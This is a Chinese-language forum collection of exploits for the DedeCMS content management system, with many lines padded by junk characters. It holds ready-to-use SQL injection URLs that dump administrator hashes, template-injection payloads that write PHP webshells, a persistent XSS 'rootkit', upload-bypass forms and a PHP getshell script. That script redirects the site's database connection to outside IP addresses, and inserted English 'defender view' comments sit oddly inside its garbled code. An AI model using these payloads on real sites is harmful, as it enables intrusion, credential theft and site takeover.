|
|
Dedecms 5.6 rss注入漏洞
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码xiao,直接生成一句话。
Dede 5.6 GBK SQL注入漏洞
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
: `6 p: ~; t0 d5 C5 u4 G6 |http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
/ d3 h K- j( M1 w1 S6 x* l1 yhttp://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A76 E2 s# Z8 B$ V* j7 |
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS 全版本 gotopage变量XSS漏洞
1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
) T. Z8 N' S ]/ R/ D3 a7 \http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="* i& Q- a1 q, v8 P1 |3 V1 w
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
$ B8 k* k( h, Q3 V$ t& ehttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
* t# ?3 E+ ?5 b7 \. o; X2 Thttp://v57.demo.dedecms.com/dede/login.php1 x& B7 L- a3 [, I" Z
DeDeCMS(织梦)变量覆盖getshell
4 \, k: f! r% \2 k2 B#!usr/bin/php -w
9 y/ w7 w9 Z+ C6 D% r<?php
/*
 * Command-line driver for the DedeCMS "variable coverage" exploit pasted on
 * this page. The paste is interleaved with stray characters, so it is not
 * runnable as-is; the comments describe what the visible code attempts.
 *
 * Arguments (from the banner below): php <script> url aid path
 *   url  - target host, used as the Host header and fsockopen() target
 *   aid  - 1, 2 or 3; sent as ?aid= and selects which shell path is reported
 *   path - prefix under which /plus/mytag_js.php is requested
 *
 * Defender view: the entire attack is a single POST to
 * /<path>/plus/mytag_js.php built in Getshell() below; success here is
 * judged only by a substring search for "OK" in what Getshell() returns.
 */
7 j0 I; C8 E+ Gerror_reporting(E_ERROR);) A. F+ h6 q* N/ n3 W D; G* z6 H
set_time_limit(0);
// Banner.
- u; N- F7 B% U1 fprint_r('
( K* g' V/ H& vDEDEcms Variable Coverage
/ q$ r' |1 B' G/ }Exploit Author: www.heixiaozi.comwww.webvul.com' r& V& k7 w w; x# g1 i( F8 j3 L
);- I; ]" R5 [' _2 R
echo "\r\n";8 D/ W7 ~% o. k( {& a! ^
// Usage text when the second argument is missing; the loose == null test
// also treats an empty-string argument as missing.
if($argv[2]==null){4 P8 {' t, r, h+ ]9 i2 o
print_r('. ^+ e6 |2 m4 }: s( w
+---------------------------------------------------------------------------+
% o! C, s! U( |9 s! {4 jUsage: php '.$argv[0].' url aid path
/ a/ k; z& p+ P5 Maid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
( n9 @! X% `; H1 V+ _Example:
5 y* H& [( o) y$ }% z- B' Tphp '.$argv[0].' www.site.com 1 old% W/ Q1 N# m5 R/ D* e
+---------------------------------------------------------------------------+& L1 Q \' ^ \* X; I8 K1 z
');+ ?' D+ |0 H+ N1 g- M* a2 L
exit;
+ m k3 G! E3 u; ?: K/ M}
// Positional arguments, taken without validation; $argv[3] is never
// checked and is undefined when only two arguments are given.
$ K' @' ?. C3 X1 G4 c$url=$argv[1];
- x+ Q' n4 ]1 {' e$ {) ~$aid=$argv[2];& d* y/ S& Y( Y7 g5 f, x# s
$path=$argv[3];
// One request; Getshell() hands back the first line read from the socket.
: K; V( g$ U' ]+ E( y2 S$exp=Getshell($url,$aid,$path);3 _4 \5 h( c& l7 t7 ]6 q+ O
// strpos() yields false when "OK" is absent, and false > 12 is false, so a
// missing marker (or an offset of 12 or less) falls into the Failed branch.
if (strpos($exp,"OK")>12){1 `1 P9 u" o2 i1 a* d e
echo "+ B, _+ g5 {* M/ K
Exploit Success \n";
// The reported location of the dropped file depends only on aid; nothing
// below verifies that such a file actually exists on the target.
6 a/ g1 T+ C6 ]4 }9 }/ Vif($aid==1)echo "$ a! R2 l* {" f4 ^
Shell:".$url."/$path/data/cache/fuck.php\n" ;
/ M% ?- _( o9 \, k1 }3 z0 R9 ~* ~: Q9 [% D' w
; q0 H' Z! D9 i" _! x- gif($aid==2)echo "# j- m. q* [* V1 ` e
Shell:".$url."/$path/fuck.php\n" ;
" _; S" s, W( I! W8 Y) J( ^7 V; W+ ?2 J$ ]# l- Q$ k
2 C8 X, h# V4 J% T& X1 M6 N3 ^
if($aid==3)echo "
9 `4 L8 a5 `6 m/ R, wShell:".$url."/$path/plus/fuck.php\n";4 p4 `7 j) P t T9 }9 y
6 d; q3 z. h, Q; ], R7 p
# y9 V C0 F {7 m. d7 B, ?}else{' ` p% `4 D& K- [
echo "
' E; l5 Y& ~* b* HExploit Failed \n";- W8 ]3 Z9 r- j
}
. N* \( D& E$ Z! _3 sfunction Getshell($url,$aid,$path){& A- h; S: I7 r4 w% B
// Builds and sends one hand-crafted HTTP/1.1 POST to
// http://<url>:80/<path>/plus/mytag_js.php?aid=<aid> and returns the first
// line fgets() reads back (normally the HTTP status line), or nothing at
// all if feof() is already true.
//
// Defender view: the form body below carries fields named
// _COOKIE[GLOBALS][cfg_dbhost], [cfg_dbuser], [cfg_dbpwd], [cfg_dbname] and
// [cfg_dbprefix] that redirect the application's database connection to a
// remote host (184.105.174.114 in this paste) - the configuration override
// ("variable coverage") this page is about. Request parameters whose names
// alias superglobals or cfg_* settings are a high-signal pattern to alert on
// and to reject at the input layer.
$id=$aid;% L, }' q: o2 S; f8 e* G8 t
$host=$url;& H( c7 Q& i) z) |/ z" K6 X
$port="80";
// URL-encoded body: doaction = this script's own URL on the target, the five
// cfg_db* overrides, nocache=true and the submit button (presumably the GBK
// bytes of the button label shown in the HTML form later on this page).
4 h/ P+ Z Y3 O$ y+ U% t$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
// Raw request headers; Content-Length is derived from $content and the
// Accept-Encoding header is left commented out.
* f4 v8 y9 W0 s6 G5 i: @$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
3 R6 @# k9 o8 [, v! I$data .= "Host: ".$host."\r\n";
0 v. ^! o: K( w* ^6 g6 \5 m% }7 N* R$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
4 N; l! q& G9 X# R. l% g. i$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
/ P. W F4 D) H" N; G! f& `$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
' T7 a8 k2 c3 L" K- ]//$data .= "Accept-Encoding: gzip,deflate\r\n";
% n- h0 q4 D( e5 l2 r5 T/ X$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";" }( o4 o0 j7 _$ Y' A) S
$data .= "Connection: keep-alive\r\n";3 P+ S! m( B; S
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";6 X! V5 L/ q$ ]* u8 C
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";- N1 ^ c z! I% S& P" d% i$ j
$data .= $content."\r\n";
// Plain TCP to port 80 (no TLS). On failure a message is printed but the
// function does not return, so fwrite() below runs against a false handle.
. ?) D, g' f/ H: ]4 t) w* f$ock=fsockopen($host,$port);/ W, L w' B/ f4 Q0 N7 b) \. W% r
if (!$ock) {% l) y( h" a" Z/ z- Y3 _& Q# p
echo "; z% O% B! g( A5 B# x
No response from ".$host."\n";
* p) i6 }$ v" Q}
$ Q0 y6 c0 L& |+ pfwrite($ock,$data);
// The loop returns on its first pass, so only a single line is ever read;
// the socket is never closed.
" j+ N* {! q: u' t: V) dwhile (!feof($ock)) {
0 Z+ j9 c/ E- S4 [" a' Y( D/ B$exp=fgets($ock, 1024);
, q3 O! D$ i3 O( _7 v. Zreturn $exp;8 N/ u) t' `( O* s5 U" \) O: g- L
}2 E6 R0 L. N @# h: {2 H
}
?>6 Z K6 l! C+ k# W/ w
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
7 G/ y, Y7 U V2 s7 c" c, Bhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
此漏洞的前提是必须得到后台路径才能实现
Dedecms织梦 标签远程文件写入漏洞
前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
<form action="" method="post" name="QuickSearch" id="QuickSearch">6 k) A# P* g) G7 r+ H
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />+ P- j$ R6 T7 k( G, Y
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
6 o6 I( Q( N& S; P u<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
/ I5 A9 M% I6 O4 F3 y<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
6 f. \: [5 V1 p+ l) n/ K, K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* p1 `' b# @& I& O: e. R# U$ W: w1 K3 |<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
; A* m/ Q/ G, i- o. e: h<input type="text" value="true" name="nocache" style="width:400">
* ]0 M) F4 Y' n7 d# Q- F<input type="submit" value="提交" name="QuickSearchBtn"><br />
: r0 Z" p* k: m1 Y</form>
3 a) W5 `" A) }! U- U" B7 p7 o8 h<script>
% i3 ^- ^6 k/ mfunction addaction()! C- _) K( Z0 o$ h- |% N3 a
{3 b& M! \# e5 L% |/ l8 i
document.QuickSearch.action=document.QuickSearch.doaction.value;
' M0 w0 L- x# p( U6 i}
* t$ s. S4 D* `- j; W1 C</script>
DedeCms v5.6 嵌入恶意代码执行漏洞
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}/ B& D$ i5 w$ I! S. P
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
Dedecms <= V5.6 Final模板执行漏洞
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
uploads/userup/2/12OMX04-15A.jpg
模板内容是(如果限制图片格式,加gif89a):
{dede:name runphp='yes'}
$ }* v8 x% l& `9 A4 Q$fp = @fopen("1.php", 'a');
, E) D9 Q" s, l- c9 E" [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
( n) x* _: Q) g# _& f@fclose($fp);! e/ L; A1 @2 A$ {6 S) O" ]
{/dede:name}$ Z7 w. B( K4 M6 \2 F" z
2 修改刚刚发表的文章,查看源文件,构造一个表单:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">& H. ^4 x& i Y3 o% A
<input type="hidden" name="dopost" value="save" />& u! [9 G5 }' N& Z; t4 R" d! E
<input type="hidden" name="aid" value="2" />+ d; V6 C2 a/ O5 l( z
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
0 w: z2 _6 V5 |; z' {/ t8 d& b<input type="hidden" name="channelid" value="1" />7 B) d# L3 u9 c6 X
<input type="hidden" name="oldlitpic" value="" />
: I8 W% I$ A" H! C9 g. M% T c<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
% J, \8 O( r' x4 {* f+ B<h3 class="meTitle"><strong>修改文章</strong></h3> d5 T Y9 h; w; z+ k
) @5 E9 G' ]* m4 p6 p4 |0 w<div class="postForm">& a8 a- L, {0 d% j" Z$ r
<label>标题:</label>
1 Q( b4 T! k$ l0 i* E* Y# e<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>( @$ |& s2 o' j- `/ F
<label>标签TAG:</label>
( j2 f) j8 S7 v" m6 Y<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)+ P% g& h( K5 w! r6 r3 _0 Q
5 W, M! \) B4 F* P/ \' F<label>作者:</label>
" O7 c' a: w7 a! ?' ?6 b<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>+ \& F* `$ B; V! V: [6 J. j
<label>隶属栏目:</label>$ Z9 r* i7 s2 S% m2 Y2 |
<select name='typeid' size='1'>
( e" m+ o! I1 S<option value='1' class='option3' selected=''>测试栏目</option>
, t' l. E' X* d' L: R2 l</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
9 w/ X, c) [9 c6 d<select name='mtypesid' size='1'>7 A8 {4 g* T+ `3 p+ e4 M4 f) R
<option value='0' selected>请选择分类...</option>
' y+ z+ p: h) o9 T9 G<option value='1' class='option3' selected>hahahha</option>2 B: G5 @: q, F( J
</select>
; X4 O. {! Z' m; ]3 c<label>信息摘要:</label>
( i H1 ^/ W1 d- g, n9 v<textarea name="description" id="description">1111111</textarea>5 _+ G$ r/ L! e
(内容的简要说明)
4 y6 l1 {, B" Z<label>缩略图:</label>/ [( \+ `/ L- [" `2 q: f
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>9 f/ v0 K) K- C# t
8 O4 v3 g# r$ t0 C7 R6 X& K<input type='text' name='templet'% X3 {* c! `0 ?6 M, F
value="../ uploads/userup/2/12OMX04-15A.jpg">5 t7 C+ C( D6 R$ Q
<input type='text' name='dede_addonfields'
5 y: |8 H2 L. q# k/ l: d9 D% w, ]value="templet,htmltext;">(这里构造)
4 r: |& g8 A+ k" H; n: r" o& v3 W</div>
9 h, d0 ]3 h; K) ]/ d<!-- 表单操作区域 -->
R+ K' Q) s- H+ C. U. `9 I<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">! R) H% j; D9 u) W: Q- e
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>$ D: P: c( H! L) D; G; D3 W
<label>验证码:</label>
% [$ _7 x$ W5 ~! E6 z6 D) _<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
, m" w3 W4 r" j% I* G<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
7 \7 @" D2 P" l) M<button class="button2" type="submit">提交</button>
$ d- K# T4 V( V/ W" O2 [<button class="button2 ml10" type="reset">重置</button>; l. Z: ]9 L8 ~' d+ P. x
</div>
$ h0 b8 W+ V* T6 m, s5 ?</div>" G: l+ P- t& }" c, R8 x2 Y
</form>% ]8 g- R" w) Y" W ?* _& i
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
假设刚刚修改的文章的aid为2,则我们只需要访问:
http://127.0.0.1/dede/plus/view.php?aid=2# O* w$ x5 ?! `, r0 @
即可以在plus目录下生成webshell:1.php
DEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}/ L3 @4 q6 A k
phpinfo();4 r3 k& o& o8 O
{/dede:field}+ Y; y9 c% h; _5 b& x" A7 k
保存为1.gif
* C% u( }, R* M1 A# N* N<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" "> % O/ |: |, W6 p, Q) I- Y+ k3 r
<input type="hidden" name="aid" value="7" /> + q0 X) J7 P% r9 J1 [2 K) v# c
<input type="hidden" name="mediatype" value="1" />
7 `3 i J, T0 T<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> - [( W. W9 `- ^$ p, o% b7 L* i9 l
<input type="hidden" name="dopost" value="save" /> / F% T( k: \1 v1 K( m$ h
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; y2 y8 b& j) d4 h6 j/ v6 a9 q
<input name="addonfile" type="file" id="addonfile"/> 3 {0 ~- w/ y& Z& t( M) \
<button class="button2" type="submit" >更改</button>
: p3 A$ @1 x$ z; g9 _3 ]% o</form>
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
" |9 C! E: W m0 ^5 ?! e9 H2 K6 A/ R发表文章,然后构造修改表单如下:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
( i9 W% w0 o: N1 i7 }: H/ W7 _$ A' Z<input type="hidden" name="dopost" value="save" /> $ ?. r. A; i' l: \6 s
<input type="hidden" name="aid" value="2" /> 3 M" i& z! V. O2 F: y% {8 r
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
0 ^& A% x& R0 T" ]7 j/ K/ Q+ Q<input type="hidden" name="channelid" value="1" /> * B$ f6 V( C" u, C: l
<input type="hidden" name="oldlitpic" value="" />
7 M" V: N w8 }1 M9 [7 k<input type="hidden" name="sortrank" value="1282049150" /> 9 s8 B- Y/ ]# P7 @* O' a/ u0 a( l
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> , z" w' q+ l3 u: V
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
2 i5 u, i$ C9 y5 K, L0 t" L2 o<select name='typeid' size='1'> . H2 `( O5 }; ~# b7 u
<option value='1' class='option3' selected=''>Test</option> 6 H q, t: F7 F( r: a0 s$ [
<select name='mtypesid' size='1'> ; q1 f; i$ T3 c" j% v
<option value='0' selected>请选择分类...</option> 1 q& Y3 R% ?9 |: P; A' }
<option value='1' class='option3' selected>aa</option></select> - b- v9 B+ w% l" x1 F7 X
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
; B3 c& }/ a* Z& o2 S<input type='hidden' name='dede_addonfields' value="templet">
! O; L* Z7 Y, [4 _3 i<input type='hidden' name='templet' value="../uploads/userup/3/1.gif"> * n: J9 i% p1 u' A
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" /> / Q% _: e0 h b& e% [! T
<button class="button2" type="submit">提交</button>
- Z# w7 ~3 i w% p' h( h</form>
织梦(Dedecms)V5.6 远程文件删除漏洞
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
密码是32位MD5减去头5位,减去尾七位,得到20位MD5密码;方法是,前减3后减1,得到16位MD5
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞
! x1 N9 w4 j$ P, Xhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='' B& \4 T+ X( {* `
织梦(Dedecms)select_soft_post.php页面变量未初始化漏洞
( |- w+ O* E8 b& f7 Z& n, a<html>
7 {1 p+ L* P4 d4 J3 X<head>. Q* j2 Y) G5 L! ^
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
2 a& Q+ g {+ t; a" B</head>2 n. y, J! U+ X$ e5 {
<body style="FONT-SIZE: 9pt">
8 ]" |) U' ~: @: b3 y7 R---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />6 ^4 h2 Q6 H! E, |; l
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
; j: {2 Z( Z# D* T! |& r9 x! p<input type='hidden' name='activepath' value='/data/cache/' />
/ z" m; ?& a* X7 Y$ C<input type='hidden' name='cfg_basedir' value='../../' />5 e* t" d& f4 g
<input type='hidden' name='cfg_imgtype' value='php' />; n- E. w* ^9 P O) u2 Z. \
<input type='hidden' name='cfg_not_allowall' value='txt' />: K5 @9 W! J+ @
<input type='hidden' name='cfg_softtype' value='php' />
% `# s0 u- {, E: D h3 B, ?<input type='hidden' name='cfg_mediatype' value='php' />: {& M. w! \! }, Y
<input type='hidden' name='f' value='form1.enclosure' />
1 ~$ S; u' s) b/ `<input type='hidden' name='job' value='upload' />
4 |' F* d5 Y& I |6 @<input type='hidden' name='newname' value='fly.php' />
9 e! F: ^0 U" y9 w3 ?Select U Shell <input type='file' name='uploadfile' size='25' />
" M2 H( x1 M$ a. `9 e7 F<input type='submit' name='sb1' value='确定' />1 ]9 n5 `* G5 D6 W
</form>
) ~2 {8 b' c2 Q& Z' y<br />It's just a exp for the bug of Dedecms V55...<br />
. G: m3 x/ [/ r1 ENeed register_globals = on...<br />
/ ~' L/ k! t7 q3 F, J3 O1 O, `; YFun the game,get a webshell at /data/cache/fly.php...<br />: K$ ^! E# e3 A& \" d( a
</body>% F: j* w6 F+ t# i
</html>
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
1. 访问网址:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>7 X( U2 t/ v& s: j
可看见错误信息
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
int(3) Error: Illegal double '1024e1024' value found during parsing
7 {2 n3 V- |, IError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
$ m7 X) Z& y+ I- ?) _) `<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>+ b6 c6 Q" B# k+ o! _2 f( Q
按确定后看到第2步骤的信息表示文件木马上传成功。
" J5 A! X' c, N6 W织梦(DedeCms)plus/infosearch.php 文件注入漏洞
1 X; j4 Z3 I. nhttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|